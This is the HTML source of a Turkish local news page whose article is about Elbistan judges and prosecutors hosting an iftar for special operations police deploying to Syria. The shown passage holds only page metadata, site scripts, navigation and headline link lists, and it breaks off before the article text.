  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Suriye&#039;deki operasyonlarda görev alacak özel harekat polislerine (PÖH), Elbistan Adliyesinde görev yapan hakim ve savcılar tarafından iftar programı düzenlendi." />
<meta name="keywords" content="Hakim ve savcılar, Suriyeye giden PÖHleri uğurladı" />
<meta name="news_keywords" content="Hakim ve savcılar, Suriyeye giden PÖHleri uğurladı">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />
<meta property="og:description" content="Suriye&#039;deki operasyonlarda görev alacak özel harekat polislerine (PÖH), Elbistan Adliyesinde görev yapan hakim ve savcılar tarafından iftar programı düzenlendi." />
  <meta property="og:image" content="https://www.elbistaninsesi.com/images/haberler/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" />
<meta name="twitter:domain" content="https://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />
<meta name="twitter:description" content="Suriye&#039;deki operasyonlarda görev alacak özel harekat polislerine (PÖH), Elbistan Adliyesinde görev yapan hakim ve savcılar tarafından iftar programı düzenlendi." />
<meta name="twitter:image:src" content="https://www.elbistaninsesi.com/images/haberler/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" /><link rel="alternate" href="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="https://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html">
<link rel="amphtml" href="https://www.elbistaninsesi.com/amp/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html">
  <link rel="image_src" type="image/jpeg" href="https://www.elbistaninsesi.com/images/haberler/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />
<meta itemprop="thumbnailUrl" content="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2022-04-09T17:29:32+02:00" />
<meta itemprop="image" content="https://www.elbistaninsesi.com/images/haberler/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Hakim ve savcılar, Suriyeye giden PÖHleri uğurladı" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'https://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'https://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

<style>
.dikeyhaberler .haber {
    width: 197px;
}
.dikeyhaberler .haber img {
    width: 200px;
    height: 120px;
}
.row-fluid [class*="span"]:first-child {
    margin-left: 0;
}
.dikeyhaberler .haber:last-child {
    margin-left: 15px;
}
#syazar {
    background-color: #EFEEEE;
}
</style>    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">14,74</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">16,10</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">923,44</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">2.393,39</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kuzey-ilceleri-yatirim-degerlendirme-toplantisi-elbistanda-yapildi-h73414.html" title="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı" >Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/oztunc-tan-toplantiya-davet-edilmeme-tepkisi-h73413.html" title="Öztunç&#039;tan toplantıya davet edilmeme tepkisi" >Öztunç&#039;tan toplantıya davet edilmeme tepkisi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" title="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" >Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/marleo-lenardit-ve-organik-tarim-topraklara-bereket-katacak-h73411.html" title="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak" >Marleo Lenardit ve Organik Tarım, topraklara bereket katacak</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kuyuya-dusen-tilki-kurtarildi-h73410.html" title="Kuyuya düşen tilki kurtarıldı" >Kuyuya düşen tilki kurtarıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kurak-avinda-yakalanan-sahsa-6-bin-lira-ceza-h73409.html" title="Kurak avında yakalanan şahsa 6 bin lira ceza" >Kurak avında yakalanan şahsa 6 bin lira ceza</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/malatyadaki-deprem-elbistanda-da-hissedildi-h73408.html" title="Malatya’daki deprem, Elbistan’da da hissedildi" >Malatya’daki deprem, Elbistan’da da hissedildi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/konyali-hayirseverden-elbistandaki-ailelere-un-yardimi-h73407.html" title="Konyalı hayırseverden Elbistan’daki ailelere un yardımı" >Konyalı hayırseverden Elbistan’daki ailelere un yardımı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kent-konseyi-stklarla-iftarda-bulustu-h73406.html" title="Kent Konseyi, STK’larla iftarda buluştu" >Kent Konseyi, STK’larla iftarda buluştu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/harcliklari-ile-ihtiyac-sahiplerinin-yuzunu-guldurduler-h73405.html" title="Harçlıkları ile ihtiyaç sahiplerinin yüzünü güldürdüler" >Harçlıkları ile ihtiyaç sahiplerinin yüzünü güldürdüler</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="https://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="bec407c54f4fbc79a382e5e2cf944aeac4426cc4" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="https://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="https://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="https://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="https://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="https://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="https://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="https://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="https://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="https://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="https://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="https://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="https://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="https://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="https://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="https://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="https://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="https://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="https://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="https://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="https://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/handan-salt-88-yasinda-h73403.html" title="Handan Salt 88 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/handan_salt_88_yasinda_h73403_c87bd.jpg" alt="Handan Salt 88 yaşında" />
Handan Salt 88 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/tevfik-ozdursun-98-yasinda-h73402.html" title="Tevfik Özdursun 98 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/tevfik_ozdursun_98_yasinda_h73402_1e2b9.jpg" alt="Tevfik Özdursun 98 yaşında" />
Tevfik Özdursun 98 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html" title="Hatun Ayşe Götürler 86 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/hatun_ayse_goturler_86_yasinda_h73401_58c81.jpg" alt="Hatun Ayşe Götürler 86 yaşında" />
Hatun Ayşe Götürler 86 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html" title="Feti Elbozan"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/feti_elbozan_h73400_790d1.jpg" alt="Feti Elbozan" />
Feti Elbozan</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/kuzey-ilceleri-yatirim-degerlendirme-toplantisi-elbistanda-yapildi-h73414.html" title="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/kuzey_ilceleri_yatirim_degerlendirme_toplantisi_elbistanda_yapildi_h73414_c7388.JPG" alt="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı" />
Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/oztunc-tan-toplantiya-davet-edilmeme-tepkisi-h73413.html" title="Öztunç&#039;tan toplantıya davet edilmeme tepkisi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/oztunc_tan_toplantiya_davet_edilmeme_tepkisi_h73413_c0661.jpg" alt="Öztunç&#039;tan toplantıya davet edilmeme tepkisi" />
Öztunç&#039;tan toplantıya davet edilmeme tepkisi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" title="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" alt="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />
Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/marleo-lenardit-ve-organik-tarim-topraklara-bereket-katacak-h73411.html" title="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/marleo_lenardit_ve_organik_tarim_topraklara_bereket_katacak_h73411_f7a65.JPG" alt="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak" />
Marleo Lenardit ve Organik Tarım, topraklara bereket katacak</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
